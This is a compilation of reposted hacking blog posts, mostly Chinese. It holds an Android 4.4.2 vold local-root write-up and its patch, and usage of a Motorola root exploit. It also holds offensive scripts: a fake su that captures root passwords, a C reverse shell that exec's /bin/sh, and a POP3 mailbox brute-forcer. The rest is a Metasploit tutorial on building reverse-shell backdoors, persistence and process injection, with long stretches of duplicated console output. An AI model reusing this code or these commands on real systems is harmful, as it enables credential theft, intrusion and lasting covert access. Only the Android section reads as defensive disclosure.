Local root vulnerability in Android 4.4.2 And POC

http://blog.cassidiancybersecurity.com/post/2014/06/Android-4.4.3%2C-or-fixing-an-old-local-root

介绍了Android 4.4.2本地提权漏洞出现的原因以及利用方法.

http://forum.xda-developers.com/moto-x/orig-development/root-4-4-x-pie-motorola-devices-t2771623

一个家伙发布了该漏洞在摩托罗拉手机上提权的EXP程序.

Android4.4.2提权漏洞利用POC

 

————————————————–\

Google has just released Android 4.4.3 version in AOSP (Android Open Source Project). The Funky Android website has published the whole changelog between versions 4.4.2 and 4.4.3.

This time, it seems Google has fixed an old vulnerability, allowing to elevate privileges from an application with a few permissions to root, on any Android version supporting Android Secure External Caches (ASEC).

Looking at the previously linked changelog, one can notice the following fix in the vold daemon:

Project: platform/system/vold
0de7c61 : Validate asec names.

Vold (Volume Management Daemon) is a daemon running as root, which main goal is to handle removable media devices. ASEC are secured containers allowing applications to securely store data on the SD card, and have been introduced back in 2010. These containers have been created because the SD Card filesystem (VFAT) does not allow privileges separation.

ASEC are simple files containing a ciphered filesystem, which is unciphered and mounted with permissions for a specific UID (and therefore for a specific application). The ASEC files (extension “.asec”) are stored on the SD Card or in the “/data” folder, and mounted in a subfolder of “/mnt/asec”.

Vulnerability

The creation of the ASEC file is performed by the following code, in VolumeManager.cpp:

const char *asecDir = isExternal ? 
                  Volume::SEC_ASECDIR_EXT : Volume::SEC_ASECDIR_INT;
int written = snprintf(asecFileName, sizeof(asecFileName),
                  "%s/%s.asec", asecDir, id);

The mount point for the newly created asec is then defined as follows:

int written = snprintf(mountPoint, sizeof(mountPoint), 
                  "%s/%s", Volume::ASECDIR, id);

The vulnerability here is rather obvious: there is no check on the “id” variable, which is the name given by the user to its ASEC container. It is therefore possible to perform a basic path traversal, to create the ASEC file and its mount point in a different directory than expected, as for example one the “attacker” can write into.

The following code is then responsible for the creation of the mount point:

if (mkdir(mountPoint, 0000)) {
  if (errno != EEXIST) {
    SLOGE("Mountpoint creation failed (%s)", strerror(errno));
    if (cleanupDm) {
      Devmapper::destroy(idHash);
    }
    Loop::destroyByDevice(loopDevice);
    unlink(asecFileName);
    return -1;
  }
}
[...]
mountStatus = xxx::doMount(dmDevice, mountPoint, false, 
                 false, false, ownerUid, 0, 0000, false);

This means that if the mount point already exists, no error is raised, and the container is correctly mounted in “mountPoint”. Guess what? If “mountPoint” already exists AND is a symlink to an existing directory, the ASEC container will be mounted over this directory. And the user will have full access to it, allowing him to write new files inside.

There are many ways of exploiting this vulnerability to gain root privileges.

Last detail about this vulnerability: it requires permissions to create ASEC containers. The “shell” user, as used by adb, has the requiered privileges. For the vulnerability to be exploited from an application, it needs the ASEC_* permissions (such as ASEC_CREATE).

The Fix

Google has now added a call to a new function “isLegalAsecId()” at the beginning of each function dealing with ASEC ids. The code of the function is the following:

bool VolumeManager::isLegalAsecId(const char *id) const {
  size_t i;
  size_t len = strlen(id);

  if (len == 0) {
    return false;
  }
  if ((id[0] == '.') || (id[len - 1] == '.')) {
    return false;
  }

  for (i = 0; i < len; i++) {
    if (id[i] == '.') {
      // i=0 is guaranteed never to have a dot. See above.
      if (id[i-1] == '.') return false;
      continue;
    }
    if (id[i] == '_' || id[i] == '-') continue;
    if (id[i] >= 'a' && id[i] <= 'z') continue;
    if (id[i] >= 'A' && id[i] <= 'Z') continue;
    if (id[i] >= '0' && id[i] <= '9') continue;
    return false;
  }

  return true;
}

This forbids the use of “..” and “/” in the ASEC ids, which fixes the path traversal attacks.

Conclusion

Google has fixed a very old local root vulnerability. We have evidences that this vulnerability was known, and it might already have been exploited in the wild by bad guys. Android is becoming more and more secure as Google introduces modern security mechanisms, but old code still needs to be fully audited to eradicate these 90’s security vulnerabilities.

———————————————————————————\

Changelog
1.1 – doh
fixes a bug where exploit only works once.

Pie is a root for motorola devices, should work up to and including 4.4.2.

I had hoped to save this until August however the bug was outed with 4.4.3, and detailed publicly by several people. It now has no value for my purposes. Sucks for me, great for you.

Vulnerability details:
http://blog.cassidiancybersecurity.c…old-local-root

This is a tethered root (think tethered jailbreak), meaning you have to run it each time you reboot in order to have root access. You do not get system write access, you do get root and busybox.

Usage:

Code:
adb push pie.jar /data/local/atvc

adb push root.sh /data/local/atvc

adb shell chmod 755 /data/local/atvc/root.sh

adb shell /data/local/atvc/root.sh

Expected output:

Code:
Retina:package jcase$ adb push pie.jar /data/local/atvc
5288 KB/s (1538203 bytes in 0.284s)
Retina:package jcase$ adb push root.sh /data/local/atvc
81 KB/s (137 bytes in 0.001s)
Retina:package jcase$ adb shell chmod 755 /data/local/atvc/root.sh
Retina:package jcase$ adb shell /data/local/atvc/root.sh
pie by jcase
want to buy me pie? paypal-> jcase@cunninglogic.com
Retina:package jcase$ adb shell
shell@ghost:/ $ su
root@ghost:/ # id
uid=0(root) gid=0(root) context=u:r:kernel:s0

Busybox license -> http://www.busybox.net/license.html
BusyBox v1.20.2-Stericson (2012-07-04 21:33:31 CDT) multi-call binary.
If busybox source is needed please ask me, while it is petty since you can get it from the obvious places, I will gladly package it on floppy disks and mail it media mail at your cost.

FAQ:
Where is source?
On my computer

Will it work on LG G3, Samsung <model>, Nexus 5?
No

Will you root X?
No, don’t ask me.

You suck!
Not really a question, but I get this a lot. This is the 5th exploit I have released for MotoX, bite me.

This doesn’t work, will you help me?
No, ask the community for support

Will you make this work on X?
No, this exploit, as it is, will only work on motorola phones, and only some.

Will you do this for me?
No

This doesn’t work!
Then you are probably running firmware that has been patched, you should have bought a dev edition.

Will you X?
No

What is your favorite pie?
I like apple pie with vanilla ice cream, and Boston cream pie.

ATTACHED FILES
File Type: zip package1.1.zip – [Click for QR Code] (1.42 MB, 165 views)
I’m taking a break of an undetermined length. Please don’t contact me about exploits

Something important? jcase@cunninglogic.com
Like Android security topics? Join our G+ community -> https://plus.google.com/communities/…07618051049043
My Bitcoin address : 1Newifz6yETTmbziCsZZstmHHPH6ejNr75

渗透用的Python小脚本

0×00

渗透的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小使用,求欣赏,求好评。

0×01

记录root密码小工具

root.py

01
#!/usr/bin/python
02
import os, sys, getpass, time
03

04
current_time = time.strftime(“%Y-%m-%d %H:%M”)
05
logfile=”/dev/shm/.su.log” //密码获取后记录在这里
06
#CentOS
07
#fail_str = “su: incorrect password”
08
#Ubuntu
09
#fail_str = “su: Authentication failure”
10
#For Linux Korea //centos,ubuntu,korea 切换root用户失败提示不一样
11
fail_str = “su: incorrect password”
12
try:
13
passwd = getpass.getpass(prompt=’Password: ‘);
14
file=open(logfile,’a’)
15
file.write(“[%s]t%s”%(passwd, current_time)) //截取root密码
16
file.write(‘n’)
17
file.close()
18
except:
19
pass
20
time.sleep(1)
21
print fail_str //打印切换root失败提示

渗透linux拿到低权限并提权无果时,将这个程序传上去,再将一个低权限用户目录下的.bashrc添加一句alias su=’/usr/root.py’; 低权限用户su root 后 成功记录密码。密码记录路径请看脚本

0×02

设置源端口反弹shell

渗透某个linux服务器,反连时目标端口为888不行,53,80还是不行,

Ping了下百度 可以ping通,

那真相只有一个

服务器变态的限制了只能某些提供已某些端口为源端口去连接外面

比如

只允许接收对80端口的访问数据包,并以80为源端口向外回复数据。

谷歌程序无果,自己查了相关api后写了个。

client-port.c

01
#include
02
#include
03
#include
04
#include
05
#include
06
void error(char *msg)
07
{
08
perror(msg);
09
exit(0);
10
}
11
int main(int argc, char *argv[])
12
{
13
int sockfd, portno, lportno,n;
14
struct sockaddr_in serv_addr;
15
struct sockaddr_in client_addr;
16
struct hostent *server;
17
char buffer[256];
18
if (argc < 3) { 19 fprintf(stderr,"usage %s hostname port LocalPortn", argv[0]); 20 exit(0); 21 } //三个参数,目标主机,目标主机端口,本地源端口 22 portno = atoi(argv[2]); 23 sockfd = socket(AF_INET, SOCK_STREAM, 0); 24 if (sockfd < 0) 25 error("ERROR opening socket"); 26 27 28 bzero((char *) &client_addr, sizeof(client_addr)); 29 lportno = atoi(argv[3]); 30 client_addr.sin_family = AF_INET; 31 client_addr.sin_addr.s_addr = INADDR_ANY; 32 client_addr.sin_port = htons(lportno); //设置源端口 33 if (bind(sockfd, (struct sockaddr *) &client_addr, 34 sizeof(client_addr)) < 0) 35 error("ERROR on binding"); 36 37 server = gethostbyname(argv[1]); 38 if (server == NULL) { 39 fprintf(stderr,"ERROR, no such host "); 40 exit(0); 41 } 42 bzero((char *) &serv_addr, sizeof(serv_addr)); 43 serv_addr.sin_family = AF_INET; 44 bcopy((char *)server->h_addr,
45
(char *)&serv_addr.sin_addr.s_addr,
46
server->h_length);
47
serv_addr.sin_port = htons(portno);
48
if (connect(sockfd,&serv_addr,sizeof(serv_addr)) < 0) //连接 49 error("ERROR connecting"); 50 dup2(fd, 0); 51 dup2(fd, 1); 52 dup2(fd, 2); 53 execl("/bin/sh","sh -i", NULL); //执行shell 54 close(fd); 55 } 用法: 1 gcc client-port.c -o port 1 chmod +x port 1 ./port 你的IP 你的监听端口 本地的源端口 如 ./port http://www.91ri.org 80 80 成功反弹shell 提权成功 0×03 邮箱爆破脚本 某个时候 需要爆破一批邮箱 Burp163.pl 01 #!/usr/bin/perl 02 use Net::POP3; 03 $email="pop.163.com"; //设置pop服务器地址 qq为pop.qq.com 04 $pop = Net::POP3->new($email)or die(“ERROR: Unable to initiate. “);
05
print $pop->banner();
06
$pop->quit;
07
$i=0;
08
open(fp1,”user.txt”);
09
@array1=;
10
open(fp2,”pass.txt”);
11
@array2=; //从文件中获取邮箱用户名及密码
12
foreach $a(@array1) {
13
$u=substr($a,0,length($a)-1);
14
$u=$u.”@163.com”;
15
foreach $b(@array2) {
16
$p=substr($b,0,length($b)-1);
17
print “cracked with “.$u.”—–“.$p.”n”;
18
$i=$i+1;
19
$pop = Net::POP3->new($email)or die(“ERROR: Unable to initiate. “);
20
$m=$pop->login($u,$p); //尝试登录邮箱
21
if($m>0)
22
{
23
print $u.”————“.$p.”—-“.”success”.”n”;
24
$pop->quit;
25
} //成功登录
26
else
27
{
28
print $u.”————“.$p.”—-“.”failed”.”n”;
29
$pop->quit; //登录失败
30
}
31
}
32
}
33
print $i;
用法 将要爆破的邮箱的pop服务器写入下面这一行 默认是163邮箱

1
$email=”pop.163.com”;
再将去除掉@后面部分的邮箱地址比如lusiyu@163.com 去除后lusiyu存进去

同目录user.txt中吗,再将字典存进去pass.txt

你会说

这个有点鸡肋吧 万一邮箱的密码很复杂

呵呵

搞到了一个小站的数据,

用这个程序批量测试密码是否就是邮箱密码 呵呵

我啥都没说。

0×04

这三个程序仅供技术研究,如读者用于违法行为,本人概不负责。
转自=: http://www.91ri.org/8680.html

msfmap和scheduleme

最近在研究meterpreter,发现这个msfmap,给力啊。虽然还有和他差不多的,但………………

https://msfmap.googlecode.com/files/MSFMap-v0.1.1.tar.bz2
这是下载地址。
如何安装?
寻找你MSF所在,windows的你自己知道路径。BT5的一般在
/opt/metasploit/msf3
/pentest/exploits/framework3
我的是在第一个,大部分都应该一样。

给install.sh 加运行权限
然后输入
./install.sh /opt/metasploit/msf3
安装到msf3中。

加载msfmap,load msfmap
msfmap和nmap差不多。(其实差很多)

meterpreter > load msfmap
Loading extension msfmap…success.
meterpreter > msfmap -PN 192.168.0.1/24

Starting MSFMap 0.1.1
MSFMap scan report for 192.168.0.1
Host is up.
Not shown: 99 closed ports
PORT   STATE SERVICE
80/tcp open  http

MSFMap scan report for 192.168.0.100
Host is up.
Not shown: 100 closed ports

MSFMap scan report for 192.168.0.101
Host is up.
Not shown: 99 closed ports
PORT   STATE SERVICE
80/tcp open  http

MSFMap scan report for 192.168.0.103
Host is up.
Not shown: 97 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
6001/tcp open  X11:1

MSFMap scan report for 192.168.0.104
Host is up.
Not shown: 100 closed ports

MSFMap scan report for 192.168.0.105
Host is up.
Not shown: 98 closed ports
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

MSFMap scan report for 192.168.0.107
Host is up.
Not shown: 97 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

MSFMap scan report for 192.168.0.108
Host is up.
Not shown: 97 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

MSFMap scan report for 192.168.0.111
Host is up.
Not shown: 95 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
3389/tcp open  ms-term-serv

MSFMap done: 256 IP address (9 hosts up) scanned in 57.54 seconds

meterpreter >

由于我家 宽带用的人较多。所以这不是重点。。。。。。。。。。。。。。。请忽略。/

meterpreter > msfmap -h
MSFMap (v0.1.1) Meterpreter Base Port Scanner
Usage: msfmap [Options] {target specification}

OPTIONS:

–top-ports <opt>  Scan <number> most common ports
-PN                Treat all hosts as online — skip host discovery
-T<0-5>            Set timing template (higher is faster)
-h                 Print this help summary page.
-oN         <opt>  Output scan in normal format to the given filename.
-p          <opt>  Only scan specified ports
-sP                Ping Scan – go no further than determining if host is online
-sS                TCP Syn scan
-sT                TCP Connect() scan
-v                 Increase verbosity level

上面参数好像就前两个可以用????  后面测试 全失败。不知道什么原因。
meterpreter > msfmap 192.168.0.100-120  这个也可以用。
这个扫描有点问题。不怎么准确。在找出nmap能加载进meterpreter时,暂时用这个。
———————————————————————————————————
meterpreter > run scheduleme -h
Scheduleme — provides most common scheduling types used during a pentest
This script can upload a given executable or script and schedule it to be
executed. All scheduled task are run as System so the Meterpreter process
must be System or local admin for local schedules and Administrator for
remote schedules

OPTIONS:

-c  <opt>  Command to execute at the given time. If options for execution needed use double quotes
-d         Daily.
-e  <opt>  Executable or script to upload to target host, will not work with remote schedule
-h         Help menu.
-hr <opt>  Every specified hours 1-23.
-i         Run command imediatly and only once.
-l         When a user logs on.
-m  <opt>  Every specified amount of minutes 1-1439
-o  <opt>  Options for executable when upload method used
-p         Password for account provided.
-r         Remote Schedule. Executable has to be already on remote target
-s         At system startup.
-t  <opt>  Remote system to schedule job.
-u         Username of account with administrative privelages.

run scheduleme -e /root/2222.exe -l

-s -i 参数都接不到sessions。
-l却可以。

上传个后门相当于永久会话。只要他有用户登录,都可以获得会话。超级给力。传个穿墙的上去,你懂的。

from  :  http://hi.baidu.com/67115248/item/085f9cd043b59b58fa576871

Metasploit BackDoor For Windows

Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试,shellcode 编写和漏洞研究提供了一个可靠平台。
这种可以扩展的模型将负载控制,编码器,无操作生成器和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。最新版本的 MSF 包含了750多种流行的操作系统及应用软件的漏洞,以及N个 shellcode 。作为安全工具,它在安全检测中用着不容忽视的作用,并为漏洞自动化探测和及时检测系统漏洞提供了有力保障。
同时他也提供了多种后门的方式,现在我们简单的了解他

msfpayload as shellcode

查看全部列表 目前有:248 蛋

1
root@Dis9Team:/home/brk# msfpayload -l
root@Dis9Team:/home/brk# msfpayload -l


他能生成多种多样的
简单的来说一个

正常的Windows后门

:用的是:windows/meterpreter/reverse_tcp

1
2
msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=8080 R | \
  msfencode -b '' -t exe -o /var/www/meterpreter.exe
msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=8080 R | \
  msfencode -b '' -t exe -o /var/www/meterpreter.exe


生成以后让目标运行 我们需要进行监听,或者SHELL

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf  exploit(handler) > set LPORT 8080
LPORT => 8080
msf  exploit(handler) > exploit 

[*] Started reverse handler on 5.5.5.1:8080
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 5.5.5.3
[*] Meterpreter session 1 opened (5.5.5.1:8080 -> 5.5.5.3:1055) at 2012-03-21 23:26:58 +0800

meterpreter >
msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf  exploit(handler) > set LPORT 8080
LPORT => 8080
msf  exploit(handler) > exploit 

[*] Started reverse handler on 5.5.5.1:8080
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 5.5.5.3
[*] Meterpreter session 1 opened (5.5.5.1:8080 -> 5.5.5.3:1055) at 2012-03-21 23:26:58 +0800

meterpreter >

其他(php asp jsp dll)

选中你的msfpayload名字,生成,你动的 例如:
Dll:


参考: The DLL Hijacking Tutorial
php:

1
2
 msf payload(bind_php) > generate -t raw -e php/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->
 msf payload(bind_php) > generate -t raw -e php/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->

JAVA:

1
 ./msfpayload java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 W > /tmp/job.jar
 ./msfpayload java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 W > /tmp/job.jar

 

不正常的Windows后门

说到正常的肯定有不正常的 例如:reverse_https reverse_http
大家都晓得 这东西秒杀防火墙的,在生成的过程中,党意外中断的链接我们可以再继续链接,就像灰鸽子一样,默认是5分钟,你可以设置SessionExpirationTimeout选项为0,代表链接永远不会过期。

1
2
3
brk@Dis9Team:~$ sudo msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=5.5.5.1 LPORT=1111 > https.exe
brk@Dis9Team:~$ file https.exe
https.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
brk@Dis9Team:~$ sudo msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=5.5.5.1 LPORT=1111 > https.exe
brk@Dis9Team:~$ file https.exe
https.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

现在我们来运行他。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf  exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf  exploit(handler) > set LPORT 1111
LPORT => 1111
msf  exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf  exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
msf  exploit(handler) > [*] Starting the payload handler...
[*] 5.5.5.3:1060 Request received for /AauE...
[*] 5.5.5.3:1060 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 2 opened (5.5.5.1:1111 -> 5.5.5.3:1060) at 2012-03-21 23:40:06 +0800
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf  exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf  exploit(handler) > set LPORT 1111
LPORT => 1111
msf  exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf  exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
msf  exploit(handler) > [*] Starting the payload handler...
[*] 5.5.5.3:1060 Request received for /AauE...
[*] 5.5.5.3:1060 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 2 opened (5.5.5.1:1111 -> 5.5.5.3:1060) at 2012-03-21 23:40:06 +0800

成功了,多点了一下 两个SHELL 我们吧SHELL绘画删除了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
msf  exploit(handler) > sessions 

Active sessions
===============

  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  2   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1060 (5.5.5.3)
  3   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1118 (5.5.5.3)
msf  exploit(handler) > sessions -k 2
[*] Killing session 2
[*] Meterpreter session 2 closed.
msf  exploit(handler) > sessions -k 3
[*] Killing session 3
[*] Meterpreter session 3 closed.
msf  exploit(handler) > sessions 

Active sessions
===============

No active sessions.

msf  exploit(handler) >
msf  exploit(handler) > sessions 

Active sessions
===============

  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  2   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1060 (5.5.5.3)
  3   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1118 (5.5.5.3)
msf  exploit(handler) > sessions -k 2
[*] Killing session 2
[*] Meterpreter session 2 closed.
msf  exploit(handler) > sessions -k 3
[*] Killing session 3
[*] Meterpreter session 3 closed.
msf  exploit(handler) > sessions 

Active sessions
===============

No active sessions.

msf  exploit(handler) >

继续监听:

1
2
3
4
5
6
7
8
9
10
11
12
msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
[*] Starting the payload handler...
msf  exploit(handler) > [*] 5.5.5.3:1280 Request received for /AauE...
[*] 5.5.5.3:1280 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 4 opened (5.5.5.1:1111 -> 5.5.5.3:1280) at 2012-03-21 23:45:57 +0800
msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
[*] Starting the payload handler...
msf  exploit(handler) > [*] 5.5.5.3:1280 Request received for /AauE...
[*] 5.5.5.3:1280 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 4 opened (5.5.5.1:1111 -> 5.5.5.3:1280) at 2012-03-21 23:45:57 +0800

继续获得了SHELL

persistence

这货是POST EXPLOITS模块的,前提你要有SHELL绘画,创建持续的后门,作为系统服务器启动
先来链接SHELL,查看帮助先:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
msf  exploit(handler) > sessions -i 4
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -L <opt>  Location in target host where to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on the remote host where Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter >
msf  exploit(handler) > sessions -i 4
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -L <opt>  Location in target host where to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on the remote host where Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter >

下面我们来运行:

1
2
3
4
5
6
7
8
9
10
11
meterpreter > run persistence -A -L c:\\windows\\ -x -i 5 -p 1234 -r 5.5.5.1
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=1234
[*] Persistent agent script is 609512 bytes long
[+] Persistent Script written to c:\windows\\FBEzRzQYpXKFg.vbs
[*] Starting connection handler at port 1234 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script c:\windows\\FBEzRzQYpXKFg.vbs
[+] Agent executed with PID 3280
meterpreter >
meterpreter > run persistence -A -L c:\\windows\\ -x -i 5 -p 1234 -r 5.5.5.1
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=1234
[*] Persistent agent script is 609512 bytes long
[+] Persistent Script written to c:\windows\\FBEzRzQYpXKFg.vbs
[*] Starting connection handler at port 1234 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script c:\windows\\FBEzRzQYpXKFg.vbs
[+] Agent executed with PID 3280
meterpreter >

安装到了 c:\windows 每隔5秒监听端口1234,本机是5.5.5.1
下面我们看看目标机子有什么情况:

多了几个VBS,这就是木马鸟,当我们重启或者登录的时候,他会自动运行,如何删除后么?

1
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc

运行他

1
2
3
meterpreter > resource /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Reading /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Running rm c:\windows\\FBEzRzQYpXKFg.vbs
meterpreter > resource /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Reading /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Running rm c:\windows\\FBEzRzQYpXKFg.vbs

payload inject

射入其他payload。。 例如:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
msf  exploit(ms08_067_netapi) > use post/windows/manage/payload_inject
msf  post(payload_inject) >
msf  post(payload_inject) > show options 

Module options (post/windows/manage/payload_inject):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   HANDLER  false                            no        Start an Exploit Multi Handler to receive the connection
   LHOST    5.5.5.1                          yes       IP of host that will receive the connection from the payload.
   LPORT    4433                             no        Port for Payload to connect to.
   OPTIONS                                   no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        Windows Payload to inject into memory of a process.
   PID                                       no        Process Identifier to inject of process to inject payload.
   SESSION                                   yes       The session to run this module on.

msf  post(payload_inject) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf  post(payload_inject) > set LPORT 9999
LPORT => 9999
msf  post(payload_inject) > set TimestampOutput 0
TimestampOutput => 0
msf  post(payload_inject) > set SESSION 5
SESSION => 5
msf  post(payload_inject) > exploit 

[*] Running module against DIS9TEAM-A1
[*] Performing Architecture Check
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager into process ID 1636
[*] Opening process 1636
[*] Generating payload
[*] Allocating memory in procees 1636
[*] Allocated memory at address 0x00780000, for 363 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 1636
[*] Post module execution completed
msf  post(payload_inject) > sessions 

Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
  4   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1      5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
  5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-A1  5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)

